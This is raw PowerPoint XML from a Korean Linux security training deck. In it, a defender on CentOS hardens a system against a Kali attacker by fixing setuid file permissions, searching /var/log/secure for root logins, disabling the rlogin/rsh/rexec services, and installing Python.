          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3018624" y="2310737"/>
            <a:ext cx="6154752" cy="2236526"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="14351" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>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공격자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kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"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linux</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의 모의침해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시스템 해킹</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실습하며</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이에 대응하여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방어자 </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CentOS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공격자가 더 이상 시스템에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위협을 가하지 못하도록</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시스템 설정 및 상황에 맞는 대응을 한다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nvGrpSpPr>
          <p:cNvPr id="6" name="그룹 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3B69F52-DEDA-4267-85A3-FA1DC300F7F9}"/>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600772A-84A9-4EDF-B257-25C7AC9BEDE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447913B-86FF-4A8F-8565-9D60825203E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B17A88ED-3592-43DE-9C78-1F086A93EC7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802904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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 1.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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>소유자를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변경하고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 및 일반에게는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소유자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chown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소유자명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권한을 설정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3D170DE5-247F-4796-9378-78ED0D38CBC1}"/>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73958F9-6BD9-4E0E-96AF-65D9C2D8A6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393DB03F-B87F-4C0E-86E8-58E011007B6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C988C73-4747-4CE5-BDB8-35CF92A3F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272270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14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B355A65-614F-401A-B129-C717D97896BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="537234" y="924349"/>
            <a:ext cx="4594860" cy="563880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E070F3A2-B311-45EC-847A-FC2D9F8F033A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="547137" y="2386275"/>
            <a:ext cx="4617720" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="표 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35A57801-35B0-4CFA-BF2E-0C3E36B41F9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3543358739"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556470" y="3347160"/>
          <a:ext cx="4932807" cy="980186"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="48487242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 접근 권한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50103813"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6410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(r) =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실행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조합하여 접근 권한을 설정한다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예를 들어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 모두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7(4 + 2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지정하고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5(4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지정한다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672701"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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1)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rwsr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소유자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확인</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dirty="0"/>
              <a:t>2) /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 접근 권한 변경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-x-r-x) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 755 /bin/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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 소유자 변경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bin/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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B93E2FFA-2307-4CB3-8A4F-B1B3CDB20E0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="537234" y="5334930"/>
            <a:ext cx="4556760" cy="708660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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C393A3F0-E427-4772-84A2-D041740BAF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20DFAB4-2444-4459-BEB0-41EF9098357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A31CA8-E669-490E-95FF-9541F3329BA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1B881AF4-F56D-4697-AB59-ADEE16D6AF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193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20" end="2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xEl>
                                              <p:pRg st="21" end="2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xEl>
                                              <p:pRg st="22" end="2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/Training/Unit/Sys/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>시스템 로그 점검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로그를 점검하여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계정으로 원격 접속을 시도한 호스트의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찾아내시오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내용 검색 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: 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로그를 점검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AB5D6D54-8014-4712-B111-84FDA5BA6AE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6A40F11-BBF5-48DB-A768-38C602830DB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A5E013C-3CB3-44FF-8BEB-18148F542D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FC6158-12EB-4ADF-B786-A5D0E1D1FC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8867327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/var/log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로그에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>검색</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># grep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root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a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.174.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로 로그인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>했음을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및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 입력 후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a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    로그에서 발견한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 입력</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14757363-6E3B-4AF9-B363-510E4A430D2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="595086" y="876481"/>
            <a:ext cx="5019040" cy="2900680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39EBFE7B-6841-478B-8867-ACE3C2831DF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124364516"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611934" y="4114973"/>
          <a:ext cx="4932807" cy="492506"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="67807887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grep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97119472"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2346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파일에서 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>키워드가 포함된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모두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5096598"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="그룹 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E94B0E58-7E52-4ACA-A830-E19D8BA5EE5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BAC0E03-97C8-48B2-9DD4-6D17B5E5D3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1D45BFC-D44D-4A60-AF78-849417F584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BF439323-8302-463F-B615-CF9C95B97BA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8819608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/Training/Unit/Sys/3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>R-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>명령어 제한</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196706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rexec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수록된 호스트 정보를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삭제하시오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호스트 정보 파일의 소유자 외에는 접근할 수 없도록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98199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 편집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16618166-9E63-4D61-BB05-67E2EDD7002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E415D15-689F-4E27-9B8C-C8BBE51D13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AF42726-15C6-4903-9EED-3C825915EF4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0D766A5A-57E3-4447-B6E7-1840A49E758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024674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/Environ/Python</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 설치</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http://www.python.org/downloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접속</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>클릭</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. Installer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 실행한 후에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>"Install Now＂</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 선택</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파이썬 환경변수 등록 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>:＂Add Python 3.9 to PATH＂ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>선택</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설치가 다 되었으면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, close </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>버튼 클릭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="그림 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D85EF85E-9567-4CD3-87AD-1500199746C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="580444" y="2337342"/>
            <a:ext cx="4972890" cy="2053401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="화살표: 오른쪽 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BD4D78C-DC0B-4185-B84C-5F29563F6287}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217951" y="3229576"/>
            <a:ext cx="814100"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C52A94DE-8EDE-48BB-A509-BF86EFA9E588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797068" y="2537012"/>
            <a:ext cx="4183896" cy="2575672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="직사각형 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA010D5-04A2-428D-9560-CB7AF238B70D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924800" y="4885765"/>
            <a:ext cx="1120588" cy="143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329A3269-BDC4-4143-A2AA-98687A28B010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7620000" y="4840941"/>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3752EC8-FC83-4537-9199-803052D2E780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6860967" y="5923722"/>
            <a:ext cx="4119997" cy="309774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="화살표: 오른쪽 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3FA508F-FE7A-4930-8E98-D6D424352B51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10046473" y="5962068"/>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706016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rlogin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/rlogin</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rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsh</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) rexec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a:t>/rexec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4) R-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 비활성화 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>cat /etc/xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>rlogin /etc/xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> /etc/xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/rexec | grep disable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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) /etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.equiv </a:t>
